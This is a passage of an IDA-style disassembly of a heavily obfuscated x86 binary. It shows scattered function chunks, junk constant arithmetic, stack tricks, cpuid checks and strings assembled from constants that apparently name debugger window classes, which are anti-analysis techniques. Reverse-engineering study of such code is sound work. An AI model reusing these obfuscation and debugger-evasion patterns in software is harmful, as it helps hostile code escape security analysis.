loc_421C38: ; CODE XREF: sub_42C1AE:loc_421F65�j
ja loc_428A5D
jmp loc_426650
; END OF FUNCTION CHUNK FOR sub_42C1AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B71E
loc_421C43: ; CODE XREF: sub_42B71E+14�j
sbb eax, eax
neg eax
push ecx
push 58187DDCh
pop ecx
or ecx, 5149280h
and ecx, 631A85Fh
xor ecx, 81A663CFh
jmp loc_428F17
; END OF FUNCTION CHUNK FOR sub_42B71E
; =============== S U B R O U T I N E =======================================
sub_421C65 proc near ; CODE XREF: _94j21ax3:00429075�j
; _94j21ax3:loc_4293DB�p
xchg esi, [esp+0]
pop esi
pop edx
locret_421C6A: ; CODE XREF: _94j21ax3:004293F0�j
retn
sub_421C65 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B772
loc_421C6B: ; CODE XREF: sub_42B772+A�j
jmp loc_428BDE
; END OF FUNCTION CHUNK FOR sub_42B772
; ---------------------------------------------------------------------------
aLerEIeLeLxSmd db '‹Eà+E؉EÜ‹EÜ‹å]ém¤',0 ; DATA XREF: sub_4288D4:loc_4288E4�o
align 4
; =============== S U B R O U T I N E =======================================
sub_421C84 proc near ; CODE XREF: _94j21ax3:loc_422AE8�j
; sub_423D09+6�p ...
; FUNCTION CHUNK AT 0042124E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00423E77 SIZE 0000000B BYTES
xchg ebx, [esp+0]
pop ebx
push ecx
call sub_42510A
loc_421C8E: ; CODE XREF: _94j21ax3:00426FC4�j
jmp loc_42124E
sub_421C84 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AE5A
loc_421C93: ; CODE XREF: sub_42AE5A:loc_4291E7�j
jz loc_421154
; END OF FUNCTION CHUNK FOR sub_42AE5A
; START OF FUNCTION CHUNK FOR sub_42C057
loc_421C99: ; CODE XREF: sub_42C057-112F�j
jmp loc_4248C8
; END OF FUNCTION CHUNK FOR sub_42C057
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B856
loc_421C9E: ; CODE XREF: sub_42B856-6ECA�j
jmp loc_422B44
; END OF FUNCTION CHUNK FOR sub_42B856
; ---------------------------------------------------------------------------
sbb edi, ecx
jmp loc_42114E
; =============== S U B R O U T I N E =======================================
sub_421CAA proc near ; CODE XREF: sub_425790:loc_4225F9�p
; _94j21ax3:00423841�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004225C2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042325F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00426B97 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042734A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004280C7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042998B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042A327 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042B110 SIZE 00000008 BYTES
xchg edx, [esp+0]
pop edx
rol eax, 3
call sub_424467
loc_421CB6: ; CODE XREF: _94j21ax3:0042212D�j
jmp loc_426B97
sub_421CAA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_421CBB: ; CODE XREF: sub_42B9CF-7F41�j
ja loc_423972
mov [ebx], esi
adc edi, 0C7A9468Bh
jmp loc_42B1EC
; END OF FUNCTION CHUNK FOR sub_42B9CF
; =============== S U B R O U T I N E =======================================
sub_421CCE proc near ; CODE XREF: _94j21ax3:00422E4F�j
; sub_423717+16�p
mov [esp+0], edx
pop edx
pop ecx
pop ecx
pop ebp
retn
sub_421CCE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_421CD6: ; CODE XREF: sub_421402+9512�j
jmp loc_4264DC
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_421CDB: ; CODE XREF: sub_42C057-5192�j
jmp loc_428288
; END OF FUNCTION CHUNK FOR sub_42C057
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423717
loc_421CE0: ; CODE XREF: sub_4284C0-74BE�j
; sub_427849-4B32�j ...
mov al, 1
jmp loc_427A63
; END OF FUNCTION CHUNK FOR sub_423717
; ---------------------------------------------------------------------------
sbb ebp, ebx
jmp loc_42BCFD
; ---------------------------------------------------------------------------
loc_421CEE: ; CODE XREF: _94j21ax3:loc_42482F�j
jl loc_4244FE
not edx
push edx
and eax, ecx
jmp loc_4244FC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_421CFE: ; CODE XREF: sub_423324-1B07�j
jl loc_42C2FD
loc_421D04: ; CODE XREF: sub_42BD03:loc_429CBF�j
; sub_421689:loc_42A2F8�j ...
jmp loc_42A947
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_421D09: ; CODE XREF: sub_421689+9C�j
; sub_42BD03:loc_42B3BF�j
push offset loc_424512
jmp loc_42A18D
; END OF FUNCTION CHUNK FOR sub_421689
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A36A
loc_421D13: ; CODE XREF: sub_42A36A+6�j
push ecx
; END OF FUNCTION CHUNK FOR sub_42A36A
; START OF FUNCTION CHUNK FOR sub_429862
loc_421D14: ; CODE XREF: sub_429862:loc_427618�j
mov esp, ebp
call sub_42AADB
loc_421D1B: ; CODE XREF: sub_42A709-2A2F�j
jmp loc_425058
; END OF FUNCTION CHUNK FOR sub_429862
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425808
loc_421D20: ; CODE XREF: sub_425808-2B86�j
jmp loc_4239E7
; END OF FUNCTION CHUNK FOR sub_425808
; ---------------------------------------------------------------------------
test al, al
jz loc_421E28
call sub_421D33
retn
; =============== S U B R O U T I N E =======================================
sub_421D33 proc near ; CODE XREF: _94j21ax3:00421D2D�p
; sub_424839:loc_4245C0�p ...
var_28 = dword ptr -28h
; FUNCTION CHUNK AT 0042157B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00421F05 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004220A6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00422495 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00422E3E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042344C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004239C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423EDE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004241F4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004249A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424DAB SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004255DC SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00426632 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042758A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042783E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004280F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428534 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004289FC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00428D7B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042B511 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042B5EC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042B813 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B8F2 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042C29F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042C550 SIZE 0000002A BYTES
xchg ebp, eax
push eax
xchg ebp, eax
jmp loc_4241F4
sub_421D33 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_421D3D: ; CODE XREF: _94j21ax3:0042208D�j
and ecx, eax
jnp loc_42350C
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_421D45: ; CODE XREF: sub_423FCD:loc_422075�j
add eax, 992004Ah
xor edx, edx
cpuid
and eax, 0FFFh
add [esi], eax
xor [esi], edx
jmp loc_4222C8
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42426B
loc_421D5D: ; CODE XREF: sub_42426B:loc_4230AA�j
push edi
push ebx
push ecx
mov eax, esp
push 701D2766h
sub [esp+10h+var_10], 701D2766h
jmp loc_42B00F
; END OF FUNCTION CHUNK FOR sub_42426B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42134B
loc_421D73: ; CODE XREF: sub_42134B+123B�j
; sub_42B487:loc_422DAC�j ...
lea eax, [ebp-20h]
mov dword ptr [eax], 70736957h
lea eax, [ebp-1Ch]
jno loc_421A0B
mov dword ptr [eax], 646E6957h
; END OF FUNCTION CHUNK FOR sub_42134B
; START OF FUNCTION CHUNK FOR sub_426716
loc_421D8B: ; CODE XREF: sub_426716:loc_42671F�j
lea eax, [ebp+var_18]
mov dword ptr [eax], 6C43776Fh
jmp loc_42342C
; END OF FUNCTION CHUNK FOR sub_426716
; ---------------------------------------------------------------------------
jb loc_42B1E2
jmp sub_42AB72
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_421DA4: ; CODE XREF: sub_428BBD:loc_427DE7�j
add ebx, 0EED3ABA7h
xchg ebx, [esp+4+var_4]
jmp sub_421246
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_421DB2: ; CODE XREF: sub_421F28:loc_429D3D�j
jz loc_424677
jmp loc_42B2E1
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425324
loc_421DBD: ; CODE XREF: sub_425324:loc_427C5F�j
mov ebp, esi
jmp loc_42A630
; END OF FUNCTION CHUNK FOR sub_425324
; =============== S U B R O U T I N E =======================================
sub_421DC4 proc near ; CODE XREF: sub_423324+3F�j
; sub_423F55+302D�p
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0042192E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042218F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00428910 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042A12D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042B954 SIZE 00000016 BYTES
xchg ecx, [esp+0]
pop ecx
cmp dword ptr [ebp-4], 0
jz loc_423F37
mov eax, [ebp-4]
add eax, 3Ch
loc_421DD8: ; CODE XREF: _94j21ax3:00423BED�j
jmp loc_421DF3
; ---------------------------------------------------------------------------
loc_421DDD: ; CODE XREF: sub_4259BF:loc_42468D�j
pop ecx
mov [ebx], eax
xchg ebp, [esp-8+arg_4]
mov ebx, ebp
pop ebp
mov dword ptr [ebp-0Ch], 1
loc_421DED: ; CODE XREF: _94j21ax3:00425396�j
jmp loc_42B954
; ---------------------------------------------------------------------------
locret_421DF2: ; CODE XREF: _94j21ax3:loc_42531F�j
retn
; ---------------------------------------------------------------------------
loc_421DF3: ; CODE XREF: sub_421DC4:loc_421DD8�j
jmp loc_42218F
sub_421DC4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426744
loc_421DF8: ; CODE XREF: sub_426744:loc_428B9C�j
xchg edi, [esp+0]
mov ebp, edi
pop edi
xor eax, eax
mov [ebp-4], eax
push 4F25D9C5h
pop eax
sub eax, 8A8CCB02h
jmp loc_42394B
; END OF FUNCTION CHUNK FOR sub_426744
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42270C
loc_421E14: ; CODE XREF: sub_42270C+8�j
; sub_42315D+8C6D�j
rol eax, 0Bh
push eax
call sub_423F43
retn
; END OF FUNCTION CHUNK FOR sub_42270C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E13
loc_421E1E: ; CODE XREF: sub_427E13+12�j
jmp loc_42136C
; END OF FUNCTION CHUNK FOR sub_427E13
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422866
loc_421E23: ; CODE XREF: sub_422866+C�j
jmp loc_42A170
; END OF FUNCTION CHUNK FOR sub_422866
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424839
loc_421E28: ; CODE XREF: _94j21ax3:00421D27�j
; sub_424839+6�j
call sub_42C057
jmp loc_42B59C
; END OF FUNCTION CHUNK FOR sub_424839
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D53
loc_421E32: ; CODE XREF: sub_427D53:loc_42383A�j
xor ecx, 0ED6D4C97h
add ecx, 0E572BB30h
xchg ecx, [esp+0]
jmp loc_4229C1
; END OF FUNCTION CHUNK FOR sub_427D53
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D65
loc_421E46: ; CODE XREF: sub_427D65-4C47�j
push 0A79DCF79h
pop eax
rol eax, 2
add eax, 0CED43873h
xor eax, 0ED4B765Ah
xor ebx, ebx
xor ecx, ecx
xor edx, edx
jmp loc_4216E6
; END OF FUNCTION CHUNK FOR sub_427D65
; ---------------------------------------------------------------------------
loc_421E66: ; DATA XREF: sub_426B65:loc_424BC3�o
rol eax, 0Fh
push eax
call sub_423F43
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_29. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4248E7
loc_421E71: ; CODE XREF: sub_4248E7-1B00�j
mov eax, [ebp-0Ch]
jmp loc_42BF20
; END OF FUNCTION CHUNK FOR sub_4248E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_421E79: ; CODE XREF: sub_422EB0+646F�j
and ebp, ebx
loc_421E7B: ; CODE XREF: sub_422EB0:loc_424E17�j
lea eax, [ebp-2BBh]
cmp dword ptr [eax], 47424454h
jz loc_42A566
jmp loc_42AA8C
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
mov [ebx], ebp
sub edi, 94FA5EF2h
jmp sub_42454E
; ---------------------------------------------------------------------------
loc_421E9F: ; DATA XREF: sub_42BAD4-9731�o
dec dword ptr [ebp-1Ch]
jnz loc_428EB0
jmp loc_424B71
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421EAD proc near ; CODE XREF: sub_4291BC-7655�p
; sub_423324:loc_4233D8�p ...
; FUNCTION CHUNK AT 00421A4A SIZE 00000005 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push offset loc_42796B
jmp loc_421A4A
sub_421EAD endp
; ---------------------------------------------------------------------------
loc_421EBD: ; CODE XREF: _94j21ax3:00428615�j
sub ecx, 6285C59Fh
xor ecx, 0BDE3911Fh
add ecx, ebp
add ecx, 0C8949CB2h
jmp loc_4287B4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_110. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_86. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_421ED8: ; CODE XREF: sub_42B9CF-724�j
call sub_42C057
test al, al
jmp loc_42947D
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C24F
loc_421EE4: ; CODE XREF: sub_42C24F-403D�j
pop eax
add ebp, 0B74FE157h
loc_421EEB: ; CODE XREF: sub_42C24F:loc_42C53C�j
call sub_42328F
; END OF FUNCTION CHUNK FOR sub_42C24F
; START OF FUNCTION CHUNK FOR sub_423BF8
loc_421EF0: ; CODE XREF: sub_423BF8+4468�j
jmp loc_423D14
; END OF FUNCTION CHUNK FOR sub_423BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4259BF
loc_421EF5: ; CODE XREF: sub_4259BF+C3E�j
jmp nullsub_125
; END OF FUNCTION CHUNK FOR sub_4259BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422866
loc_421EFA: ; CODE XREF: sub_422866:loc_42486B�j
jnz loc_423C17
jmp loc_424EC8
; END OF FUNCTION CHUNK FOR sub_422866
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_421F05: ; CODE XREF: sub_421D33:loc_4280F0�j
mov dword ptr [eax], 474244h
push 0
lea eax, [ebp-20h]
push eax
call sub_42B83A
push esi
jmp loc_423EDE
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_421F1C: ; CODE XREF: sub_42284F-131A�j
push offset loc_427F26
jmp loc_4274C3
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
loc_421F26: ; CODE XREF: _94j21ax3:0042B57A�j
sbb ebx, ecx
; =============== S U B R O U T I N E =======================================
sub_421F28 proc near ; CODE XREF: sub_4254AE+F5A�p
; FUNCTION CHUNK AT 00421100 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004217AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00421882 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00421DB2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423CBF SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00423EB6 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004244DB SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00424676 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00424BB9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042702F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427905 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042790D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004285BA SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004291FA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00429A51 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429D35 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042A057 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ADB1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B1A8 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042B2E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B6A6 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 0042BCAB SIZE 00000005 BYTES
mov [esp+0], edx
pop edx
or eax, eax
jnz loc_429D35
jmp loc_42702F
sub_421F28 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_421F39: ; CODE XREF: _94j21ax3:0042399A�j
cmp ebx, 1B1AAEFAh
jmp loc_423B8D
; ---------------------------------------------------------------------------
locret_421F44: ; CODE XREF: _94j21ax3:loc_42AFE4�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A254
loc_421F45: ; CODE XREF: sub_42A254+9�j
mov eax, ds:dword_42407C
or eax, eax
jnz loc_423832
jmp loc_425068
; END OF FUNCTION CHUNK FOR sub_42A254
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4239A5
loc_421F58: ; CODE XREF: sub_4239A5:loc_429F78�j
push offset loc_4259A6
jmp loc_42475E
; END OF FUNCTION CHUNK FOR sub_4239A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EDA
loc_421F62: ; CODE XREF: sub_428EDA-73A5�j
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_428EDA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_421F65: ; CODE XREF: sub_42C1AE-4BC8�j
jmp loc_421C38
; END OF FUNCTION CHUNK FOR sub_42C1AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422898
loc_421F6A: ; CODE XREF: sub_422898+9�j
call sub_426C2E
loc_421F6F: ; CODE XREF: sub_42284F+1139�j
jz loc_42C2AC
loc_421F75: ; CODE XREF: sub_42284F:loc_42ADF8�j
push eax
push 2F14513Ch
xor eax, 0B07AF54Fh
jmp loc_42434F
; END OF FUNCTION CHUNK FOR sub_422898
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B358
loc_421F86: ; CODE XREF: sub_42B358-5E9�j
add edx, 0B3A13B91h
mov edx, [edx]
mov eax, [edx]
add edx, 4
mov edx, [edx]
push edx
push eax
push edi
jmp loc_4295C0
; END OF FUNCTION CHUNK FOR sub_42B358
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_421F9D: ; CODE XREF: sub_42C0BC:loc_42560B�j
jl loc_424529
; END OF FUNCTION CHUNK FOR sub_42C0BC
; START OF FUNCTION CHUNK FOR sub_423C3E
loc_421FA3: ; CODE XREF: sub_423C3E-1543�j
jmp nullsub_134
; END OF FUNCTION CHUNK FOR sub_423C3E
; ---------------------------------------------------------------------------
xchg esi, ebx
popf
jg loc_427527
; START OF FUNCTION CHUNK FOR sub_422C48
loc_421FB1: ; CODE XREF: sub_422C48:loc_42C1DD�j
shr esi, 10h
jmp loc_424523
; END OF FUNCTION CHUNK FOR sub_422C48
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_181. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_421FBA: ; CODE XREF: _94j21ax3:0042B6A1�j
jmp locret_42AE16
; ---------------------------------------------------------------------------
loc_421FBF: ; CODE XREF: _94j21ax3:00428572�j
jmp locret_422EDF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_421FC4: ; CODE XREF: sub_4294B3-5C00�j
jmp loc_42750E
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_421FC9: ; CODE XREF: sub_421402+27�j
rol ebx, 1Ch
cmp ebx, 0B108C25Eh
jmp loc_42885D
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
loc_421FD7: ; CODE XREF: _94j21ax3:loc_42479D�j
not ebp
loc_421FD9: ; CODE XREF: _94j21ax3:00427CDF�j
jmp loc_42AB7E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429974
loc_421FDE: ; CODE XREF: sub_429974+4�j
mov [esp+4+var_4], ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_429F70
or eax, eax
jnz loc_428717
jmp loc_42C349
; END OF FUNCTION CHUNK FOR sub_429974
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4248E7
loc_421FF7: ; CODE XREF: sub_4248E7-373E�j
jz loc_425210
loc_421FFD: ; CODE XREF: sub_423324-F40�j
jmp loc_429245
; END OF FUNCTION CHUNK FOR sub_4248E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428620
loc_422002: ; CODE XREF: sub_428620:loc_42211B�j
xor edi, 0D246B1BBh
add edi, 0BD7CAA1h
xchg edi, [esp+0]
jmp sub_42B079
; END OF FUNCTION CHUNK FOR sub_428620
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_422016: ; CODE XREF: sub_423324+3A14�j
sbb eax, 1E31D558h
loc_42201C: ; CODE XREF: sub_423324:loc_426680�j
push edx
push 4E3D1EF2h
pop edx
xor edx, 9F7ECBF7h
jmp loc_427732
; END OF FUNCTION CHUNK FOR sub_423324
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_66. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421047
loc_42202F: ; CODE XREF: sub_421047+A�j
jmp loc_42573B
; END OF FUNCTION CHUNK FOR sub_421047
; =============== S U B R O U T I N E =======================================
sub_422034 proc near ; CODE XREF: sub_42AA5F-6986�p
; _94j21ax3:0042772D�j
mov [esp+0], edx
pop edx
mov edx, 0A2CD59D9h
call sub_422048
mov ds:dword_425BD0, eax
retn
sub_422034 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_422048 proc near ; CODE XREF: sub_422034+9�p
; sub_42780F-427B�p ...
; FUNCTION CHUNK AT 004220B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422326 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042281D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004243D1 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00424D40 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042525C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427103 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004271AB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429ED1 SIZE 0000000A BYTES
push ebp
jmp loc_4243D1
sub_422048 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42972F
loc_42204E: ; CODE XREF: sub_42972F-2B20�j
call sub_42ABB1
; END OF FUNCTION CHUNK FOR sub_42972F
; START OF FUNCTION CHUNK FOR sub_424DE8
loc_422053: ; CODE XREF: sub_424DE8+27D3�j
jmp loc_424649
; END OF FUNCTION CHUNK FOR sub_424DE8
; =============== S U B R O U T I N E =======================================
sub_422058 proc near ; CODE XREF: _94j21ax3:00422623�j
; _94j21ax3:004273D2�p
mov [esp+0], edi
pop edi
call sub_42574E
mov edx, 6A74FD15h
call sub_422401
sub_422058 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_429A83
loc_42206B: ; CODE XREF: sub_429A83-17DA�j
; sub_423324:loc_42BE96�j
jmp loc_4253F7
; END OF FUNCTION CHUNK FOR sub_429A83
; ---------------------------------------------------------------------------
loc_422070: ; CODE XREF: _94j21ax3:004242BF�j
jmp loc_423E68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_422075: ; CODE XREF: sub_423FCD+2A92�j
jge loc_421D45
; END OF FUNCTION CHUNK FOR sub_423FCD
; START OF FUNCTION CHUNK FOR sub_427849
loc_42207B: ; CODE XREF: sub_427849-408C�j
jmp loc_42B41A
; END OF FUNCTION CHUNK FOR sub_427849
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_422080: ; CODE XREF: sub_423324-191E�j
jmp loc_422157
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
sbb eax, edi
jbe loc_4236B9
jmp loc_421D3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424320
loc_422092: ; CODE XREF: sub_424320-54A�j
push 0D0C05DEFh
pop edi
add edi, 2F8259CBh
xchg edi, [esp+4+var_4]
jmp sub_4239A5
; END OF FUNCTION CHUNK FOR sub_424320
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_4220A6: ; CODE XREF: sub_421D33+24D8�j
cmp eax, 229F6B31h
jmp loc_428D7B
; END OF FUNCTION CHUNK FOR sub_421D33
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_220. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422048
loc_4220B2: ; CODE XREF: sub_422048+239F�j
jmp loc_422326
; END OF FUNCTION CHUNK FOR sub_422048
; =============== S U B R O U T I N E =======================================
sub_4220B7 proc near ; DATA XREF: sub_42463C+3�o
; FUNCTION CHUNK AT 0042107B SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00429CE1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429E29 SIZE 00000005 BYTES
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_42C224
or eax, eax
jnz loc_42107B
jmp loc_429E29
sub_4220B7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_4220CE: ; CODE XREF: sub_42C0BC-1CA6�j
push 1F9D0001h
pop ebx
or ebx, 0CFAFEA16h
cmp ebx, 31F050C0h
jmp loc_42560B
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_4220E5: ; CODE XREF: sub_423324:loc_4257B7�j
jnz loc_427871
jmp loc_428ABD
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A7A6
loc_4220F0: ; CODE XREF: sub_42A7A6-8B73�j
adc eax, esi
push 2FD81DC1h
jmp loc_42386D
; END OF FUNCTION CHUNK FOR sub_42A7A6
; =============== S U B R O U T I N E =======================================
sub_4220FC proc near ; DATA XREF: sub_42484C+3C5A�o
or [ecx+edx], al
mov ecx, [ebp-18h]
and ecx, 7
push offset sub_426FE1
jmp loc_42B509
sub_4220FC endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_422110: ; CODE XREF: sub_423F55+81D6�j
jmp loc_426B46
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_422115: ; CODE XREF: sub_42284F+56AC�j
jmp loc_42A165
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
locret_42211A: ; CODE XREF: _94j21ax3:00425917�j
